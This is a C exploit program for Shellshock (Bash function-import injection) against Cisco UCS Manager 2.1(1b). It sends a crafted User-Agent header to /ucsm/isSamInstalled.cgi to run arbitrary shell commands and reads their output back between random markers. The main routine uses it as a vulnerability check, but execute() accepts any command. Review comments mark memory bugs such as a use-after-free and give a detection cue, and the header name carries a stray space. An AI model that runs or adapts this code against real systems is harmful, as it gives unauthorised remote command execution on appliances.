UCS_Manager_RCE.c
// Cisco UCS Manager 2.1 (1b)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#define MAX_RESPONSE_SIZE 8192
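/**
 * Build a heap-allocated, NUL-terminated string of `length` characters drawn
 * from [a-zA-Z0-9].
 *
 * The characters come from rand(), which nothing in the visible file seeds,
 * so the sequence repeats from run to run; the result is a convenience
 * marker, not an unpredictable token.
 *
 * @param length  number of characters wanted; must be >= 0
 * @return newly allocated string owned by the caller (release with free()),
 *         or NULL when length is negative or the allocation fails
 */
char *random_text(int length) {
    static const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

    if (length < 0) {
        /* A negative length would put the terminator write before the buffer. */
        return NULL;
    }

    char *text = malloc((size_t)length + 1);
    if (text == NULL) {
        return NULL;
    }

    for (int i = 0; i < length; i++) {
        text[i] = charset[rand() % (sizeof(charset) - 1)];
    }
    text[length] = '\0';
    return text;
}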
/*
 * Send one HTTP GET for /ucsm/isSamInstalled.cgi to target_ip:port and return
 * the text that the response carries between two copies of a random marker.
 *
 * The header line after Host has a value that starts with a Bash function
 * definition ("() { test;};") followed by shell text embedding `cmd`
 * unescaped. This matches the Bash function-import injection pattern
 * commonly called Shellshock, which affects CGI handlers that copy header
 * values into the environment of an unpatched Bash. For detection, a header
 * value beginning with "() {" on a request to this path is the
 * distinguishing feature of the traffic; the durable mitigation is a patched
 * Bash / vendor-fixed release on the appliance.
 *
 * Returns a malloc'd string the caller must free(), or NULL on socket,
 * connect or recv failure, or when the marker pair is not found.
 *
 * NOTE(review): memory-handling defects in this client code as written:
 *  - `mark` is not freed on the two early returns (socket / connect failure).
 *  - `mark` is freed before strlen(mark) and strstr(start, mark) read it,
 *    which is a use-after-free (undefined behavior).
 *  - The results of random_text(), inet_pton(), snprintf(), send() and the
 *    output malloc() are not checked.
 */
char *execute(const char *target_ip, int port, const char *cmd) {
int sock;
struct sockaddr_in server_addr;
char request[1024];
char response[MAX_RESPONSE_SIZE];
// Random delimiter used to locate the echoed output inside the HTTP response.
char *mark = random_text(32);
int bytes_received;
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
perror("Socket creation failed");
// NOTE(review): mark is still allocated here and is not freed.
return NULL;
}
// NOTE(review): server_addr is not zeroed before its fields are filled in.
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port);
// NOTE(review): inet_pton's return value is ignored, so an unparsable
// target_ip is not reported before connect() is attempted.
inet_pton(AF_INET, target_ip, &server_addr.sin_addr);
if (connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
perror("Connection failed");
close(sock);
// NOTE(review): mark is still allocated here and is not freed.
return NULL;
}
// Format the whole request into a fixed 1024-byte buffer; snprintf bounds the
// write, but truncation of a long cmd is not detected.
snprintf(request, sizeof(request),
"GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\n"
"Host: %s\r\n"
"User -Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo \"$(%s)\"; echo %s;\r\n"
"Connection: close\r\n\r\n",
target_ip, mark, cmd, mark);
send(sock, request, strlen(request), 0);
memset(response, 0, sizeof(response));
// A single recv() call: at most MAX_RESPONSE_SIZE - 1 bytes are read, and a
// response delivered in several segments may be only partly captured.
bytes_received = recv(sock, response, sizeof(response) - 1, 0);
close(sock);
if (bytes_received < 0) {
perror("Receive failed");
free(mark);
return NULL;
}
// Index is in range because recv() was capped at sizeof(response) - 1; the
// buffer was already zero-filled by the memset above.
response[bytes_received] = '\0';
// First occurrence of the marker in the raw response (headers included).
char *result = strstr(response, mark);
// NOTE(review): mark is released here but is read again by strlen() and
// strstr() below -- use-after-free.
free(mark);
if (result) {
char *start = result + strlen(mark);
char *end = strstr(start, mark);
if (end) {
// Copy the bytes between the two markers into a fresh, NUL-terminated buffer.
size_t length = end - start;
// NOTE(review): malloc result is not checked before the copy.
char *output = malloc(length + 1);
strncpy(output, start, length);
output[length] = '\0';
return output;
}
}
return NULL;
}
/*
 * Probe target_ip:port once: hand execute() the command "echo <token>" with a
 * fresh 32-character token and report whether the token appears in what
 * execute() returns.
 *
 * Returns 1 when the token is found, 0 otherwise (including when execute()
 * returns NULL).
 */
int check(const char *target_ip, int port) {
    char probe_cmd[64];
    char *token = random_text(32);
    int found = 0;

    snprintf(probe_cmd, sizeof(probe_cmd), "echo %s", token);

    char *reply = execute(target_ip, port, probe_cmd);
    if (reply != NULL && strstr(reply, token) != NULL) {
        found = 1;
    }

    /* free(NULL) is a no-op, so no guard is needed when execute() failed. */
    free(reply);
    free(token);
    return found;
}
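/*
 * Entry point: expects <target_ip> <port>, runs check() once against that
 * endpoint and prints the verdict.
 *
 * Returns 1 on a usage error or an invalid port argument, 0 otherwise.
 */
int main(int argc, char *argv[]) {
    if (argc < 3) {
        printf("Usage: %s <target_ip> <port>\n", argv[0]);
        return 1;
    }

    const char *target_ip = argv[1];

    /*
     * strtol rather than atoi: atoi returns 0 for non-numeric text and gives
     * no error signal, and an out-of-range value would be silently truncated
     * to 16 bits by htons() later on. Overflowed input yields LONG_MAX or
     * LONG_MIN, which the range test below also rejects.
     */
    char *end = NULL;
    long parsed = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || parsed < 1 || parsed > 65535) {
        fprintf(stderr, "Invalid port: %s\n", argv[2]);
        return 1;
    }
    int port = (int)parsed;

    if (check(target_ip, port)) {
        printf("Target is vulnerable\n");
    } else {
        printf("Target is not vulnerable\n");
    }
    return 0;
}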